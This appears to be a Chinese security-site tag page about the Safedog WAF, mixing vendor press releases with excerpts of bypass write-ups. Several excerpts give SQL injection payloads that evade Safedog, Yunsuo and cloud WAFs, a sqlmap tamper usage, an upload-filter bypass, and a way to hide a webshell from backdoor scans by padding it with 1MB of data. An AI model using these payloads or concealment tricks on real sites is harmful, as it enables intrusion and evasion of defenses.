记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

全方位绕过软WAF攻略

0×00  前言      现在软waf多如牛毛,各大厂商的安全工具如360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示: 看到以上三个拦截提示就让人头疼不已,欲罢不能。so,就在网上搜索各种绕过waf的资料,结合别人的思路和个人经验,写下这篇文章。 0×01   数据库特性 /**/ ; ‘ “ # – – + – - + - +、-执行结果: –、– -、– +、#执行结果: /**/执行结果: 0×02   拦截情况 SQL注入代码: header('content-type:text/html;chaset=utf-8');   

 安全狗工作负载(主机)安全产品正式进入4.0时代

6月3 日,安全狗召开了“攻防在即,构建最后一道防线-安全狗工作负载安全4.0”产品线上发布会,正式将安全狗的主机产品进化到4. 0 时代。在原有的3.0版本基础上,融入ATT-ck框架,并结合近年攻防对抗中的实际应用场景,着眼于新形势下的新威胁,延展了资产梳理的范畴和治理体系,进化了新一代的精准检测,精准识别,精确防御的能力,为广大用户构建了最后一公里的安全区,从而进一步提升网络空间安全能力。 “新基建”重塑网络安全生态 网络安全管理亟需新进化在新基建的浪潮下,5G网络、大数据中心、人工智能等其他新技术正渗透到社会发展的各个层面。在消费互联网向工业互联网转型的过程中,新技术的应用极大地改变了各行各业在数据存储和使用、业务管理、办公流程和工作量等方面的运作模式。作为承载数据资产和业务管理的基础设施,主
发布时间:2020-06-05 21:46 | 阅读:10248 | 评论:0 | 标签:厂商供稿 主机安全 安全狗

【牛人访谈】细谈微隔离

在越来越关注攻防对抗实战防护能力的今天,在零信任网络被炒的越来越热的今天,我们重新审视按照这些新理念构建的纵深防御体系,结果发现依然问题重重:在堆砌了大量安全产品后依然发现在资产管理、漏洞安全运营到内部隔离等基础安全工作跟不上安全态势的变化。就拿隔离来说,当攻击者有机会拿到内网一个跳板机,结果发现内网网络基本是畅通的;这两年的HW攻防对抗演练活动中这个问题的暴露尤为明显,原来奉行的内网基本安全的策略在攻防对抗中被“打”的体无完肤;同时随着内部网络的架构从传统的IT架构向虚拟化、混合云和容器化升级变迁,结果发现内部隔离不再是一件容易的事情。为了适应攻防对抗防护的要求、为了满足新的IT架构的要求,我们不得不再重新分析和审视隔离的重要性。对此,我们有幸邀请到多年来深耕(云)主机安全领域的安全狗创始人&CEO陈
发布时间:2020-05-13 20:51 | 阅读:10796 | 评论:0 | 标签:牛人访谈 首页动态 安全狗 微隔离

安全狗陈奋: 细谈微隔离

前言 在越来越关注攻防对抗实战防护能力的今天,在零信任网络被炒的越来越热的今天,我们重新审视按照这些新理念构建的纵深防御体系,结果发现依然问题重重:在堆砌了大量安全产品后依然发现在资产管理、漏洞安全运营到内部隔离等基础安全工作跟不上安全态势的变化。就拿隔离来说,当攻击者有机会拿到内网一个跳板机,结果发现内网网络基本是畅通的;这两年的HW攻防对抗演练活动中这个问题的暴露尤为明显,原来奉行的内网基本安全的策略在攻防对抗中被“打”的体无完肤;同时随着内部网络的架构从传统的IT架构向虚拟化、混合云和容器化升级变迁,结果发现内部隔离不再是一件容易的事情。为了适应攻防对抗防护的要求、为了满足新的IT架构的要求,我们不得不再重新分析和审视隔离的重要性。   NO.1   什么是微隔离 网络

全方面绕过安全狗注入

最近虽然比较忙,但是还是想写点技术方面的东西做个记录。正好给公司攻防环境出了一道web的题加了狗,就试着绕一下分享出来吧.环境预览用了最新版的安全狗apache版本4.0漏洞环境绕过and 1=1and 1=1拦截and ord(0x1) == and Trueand ord(0x0) == and False绕过 order by正常order by 被咬在 order 和by之间放点无效字符,然后再换个行order /*|--|*/--+%20%0Aby 3%23 绕过绕过 union selectunion select 1,2,3 被咬这里用内连注释+空语句+注释+换行注:MySQL数据库为了保持与其他数据库兼容,特意新添加的功能
发布时间:2020-04-20 14:17 | 阅读:22083 | 评论:0 | 标签:注入 安全狗

Bypass安全狗4.0

Bypass之路-安全狗4.0最近准备多搞搞实战,就准备从绕waf开始,第一位受害者就选安全狗4.0叭。源代码:<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>check</title></head><?php$agent = $_SERVER['HTTP_USER_AGENT'];include 'connection.php';function LoginCheck() { if (isset($_GET['username']) &&
发布时间:2020-04-07 10:27 | 阅读:20198 | 评论:0 | 标签:安全狗

安全狗SQL注入Bypass

Bypass之路-安全狗4.0最近准备多搞搞实战,就准备从绕waf开始,第一位受害者就选安全狗4.0叭,用的靶机就是2019极客大挑战的几道sql注入题1=1绕过'and 1=1-- -被拦截:&符号可以绕'%261-- -'%26true-- -'%260-- -'%26false-- -xor同样可以绕:'Xor 1-- -'Xor true-- -'or length(database()=4)-- -会被ban,这样绕:'%26(length(database/**/())=4)-- -'%26(ascii(@@version)=53)-- -这样也可以1'or -1=-1-- -1'or -0=-0-- -...内敛注释:
发布时间:2020-03-30 12:52 | 阅读:26728 | 评论:0 | 标签:注入 安全狗

大型企业如何部署落地(云)主机EDR+态势感知平台?

一、前言大型企业的项目实施往往涉及到大量部门和分、子公司的协调配合,这带来了双方面的困难:在技术上,设备和系统分散且不统一,威胁因素和程度难以感知,决策层对于当前的安全态势难以描述和决策;在工作的推进方面,客户企业下属各单位的配合程度直接影响了项目实施的进展和质量,如何做好协调沟通工作、顺利推进项目实施,也是对安全行业极大的考验。我们将在这篇文章里,结合我们曾经实施过的一些案例,探讨如何为大型企业部署实施大数据安全态势感知的项目。希望本文能够起到“抛砖引玉”的作用,如有更好的见解,望不吝赐教,笔者不胜感激。二、项目背景1、客户信息客户是大型集团性企业,旗下拥有投资企业300余家,全资及控股投资企业逾200家,员工超万人。2、项目目标解决集团信息安全在横向安全体系方面的缺陷,实现全网安全感知、检测、预警及运维响应
发布时间:2020-03-13 20:37 | 阅读:21219 | 评论:0 | 标签:厂商供稿 (云)主机EDR 安全狗 态势感知

安全狗携云工作负载安全产品矩阵亮相BCS 2019北京网络安全大会

2019北京网络安全大会(BCS 2019)今日(8月21日)在北京国家会议中心正式举行,本届大会以“聚合应变,内生安全”为主题,汇聚了来自全球30多个国家近400位行业领袖、产业精英,以及70多个全球知名安全研究机构和500家国内外知名企业。大会持续了21日-23日三天,涵盖了33场国际峰会、40场安全行业高端论坛、500多个演讲议题,涵盖了技术创新、产业发展、政策法规、解决方案等各类内容,其中云计算由于愈发广泛和深入应用的趋势,其安全受到了业内的重点关注。在大会的安全沙龙中,安全狗受邀参与,并分享了关于(云)主机安全的一些见解。“从云工作负载安全平台的技术要求来看,(云)主机的安全防护应当从过去以杀毒、漏洞补丁和加
发布时间:2019-08-29 18:10 | 阅读:46664 | 评论:0 | 标签:行业 安全狗

十九大召开:重大会议活动网络安保如何做好?

近年来针对政府网站的攻击日趋严重, 特别在重大活动期间更有可能发生突然的网络安全事件。 政府和重要单位、媒体的官方网站不仅承担着面向公众和国内外公布准确信息的责任,更是国家形象的一张名片,保证其安全的重要性不言而喻。十九大召开,重点单位受到网络攻击的风险骤然增加,面对此种情形,是否应该根据具体的情形制定一整套完整的网络应急方案,又如何做好政府和企业等众多重点单位的网络安保工作呢?1. 全面扫描 洞悉安全隐患孙子兵法里有一句话,叫“未战而庙算胜者,得算多也”,意思是说,在战争前筹划越充分,胜利的把握就越大。对于网络安保工作来说一样如此,对当前信息系统进行检查和监测,全面了解保护对象的安全形势和基本问题,对于后续制定网络安保方案开展安保工作有很重要的基础性作用。2. 实时监测 消弭风险于无形一般来说,受限于制度、技
发布时间:2017-10-22 09:30 | 阅读:276867 | 评论:0 | 标签:术有专攻 内容防篡改 安全狗 实时监测 网络安保

课程推荐|安全牛课堂厂商专区——安全狗

1. 安全运维工程师成长手册内容简介:企业对安全能力的需求,不只是在安全产品本身,运维人才也是不可或缺的一部分。而一线的安全运维攻城狮,更是要在激烈的“攻防对抗”中为企业的整体安全性做出保障。“识人面相”明确自生位置, 技术能力, 希望达到的高度。物以类聚, 人以群分,选对团队, 跟准人, 才能在这”恶劣”的环境中生存下去。渗透测试与漏洞挖掘安全运维工程师有别于运维工程师的最大差别就是拥有攻防技能 而依仗攻防对抗的思维来构建企业安全体系, 也是安全建设中不可或缺的一部分。安全监控与安全部署安全监控防御三要术, 可知, 可控, 可信. 安全部署从基线扫描开始, 配置安全, WEB安全, 部署策略, 架构风险, 你需要的不仅仅是标准, 还需要实实在在能落地的方法论。应急响应与资产巡检出来混得, 总要被黑的。被黑不可
发布时间:2017-08-10 01:05 | 阅读:119223 | 评论:0 | 标签:活动集中营 厂商专区 安全牛课堂 安全狗 服务器安全

云锁/安全狗注入bypass

http://www.safedog.cn/?id=123/*/#*/union/*/#*/select/*/#*/1,2,3/*/#*/from/*/#*/admin http://www.yunsuo.com.cn/?id=2/*/#*/union/*/#*/select/*/#*/id,username,password/*/#*/from/*/#*/admin 使用sqlmap进行注入时 遇上安全狗/云锁的时候,保存上面脚本为ian.py sqlmap.py -u”http://www.baidu.com” –tamper=ian.py –delay 2 delay 2 间隔两秒发送包这样保持不会被安全狗封ip  
发布时间:2017-02-03 06:10 | 阅读:554127 | 评论:0 | 标签:安全文章 注入 安全狗

网络安全之绕过安全狗上传拦截

前几天遇到个网站有安全狗,上传的时候老是被拦截,所以昨天本地搭建环境测试了下,测试结果如下:这里我首先得说下http协议:在http协议中以;号为结束某条语句,不找到;号,http协议是不会判断他结束的。这里我直接上传会被拦截 相信研究过安全狗,的都能认出来这是被拦截的界面吧然后我再filename这里进行换行 这里就成功的进行绕过了。
发布时间:2016-11-21 16:40 | 阅读:159653 | 评论:0 | 标签:安全狗

绕过安全狗写shell和隐藏后门大马

安全狗默认配置只检测数据前1024kb的内容。本地后门扫描也只扫描小于1024KB的文件可以在大马文件前面添加1M的数据,必须在前面,利用写的方式写入 php: fwrite(fopen('wooyun.php','w+'),(1M+大马); 这样是不会被检测到的。但上传就是时好时坏。饶过本地后门扫描无压力
发布时间:2016-08-13 12:40 | 阅读:127702 | 评论:0 | 标签:后门 安全狗

网站安全狗最新版SQL注入绕过

测试环境:code 区域Windows XP + php + Apache 2.4.10 + mysql1、版本2、尝试code 区域**.**.**.**/sql.php?id=-1/*!UNION ALL*//*!SELECT*/1,2,3被拦截难道是拦截union?select?还是关键字组合?以前安全狗版本还能看到正则,现在直接内置加密了。。。逆不出来了。然后fuzzing一个个测试3、绕过防护全开payload:code 区域**.**.**.**/sql.php?id=-1/*/*/UNION/*/*/SELECT/*/*/1,/*!USER*/(),uuid()code 区域**.**.**.**/sql.php?id=-1/*/*/UNION/*/*/SELECT/*/*/1,/*!da
发布时间:2016-07-12 21:15 | 阅读:189883 | 评论:0 | 标签:注入 安全狗

Bypass阿里云盾、百度云加速、安全宝、安全狗、云锁、360主机卫士SQL注入防御

Mysql在执行语句时,#注释将忽略掉"当前行"后面的所有语句,但是即使忽略了注释后面的语句,遇到换行的话还是会紧接注释之前的语句继续执行。再经过URL编码后为%23%0A 漏洞证明: 阿里云盾:Bypass:code 区域https://**.**.**.**/ask/3689?spm=5176.100241.0.0.eViKRY?id=1%20union%23%0Aselect%20user%20from%20ddd百度云加速:Bypass:安全宝:安全宝就比较有意思了,这个方法试了下不可行。再看看安全宝怎么检测的:只有union select不会被拦截。当union select后面加上查询字段的时候就会被拦截,所以可以不必在union与select之间使用这
发布时间:2016-07-08 09:55 | 阅读:131890 | 评论:0 | 标签:注入 安全狗

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云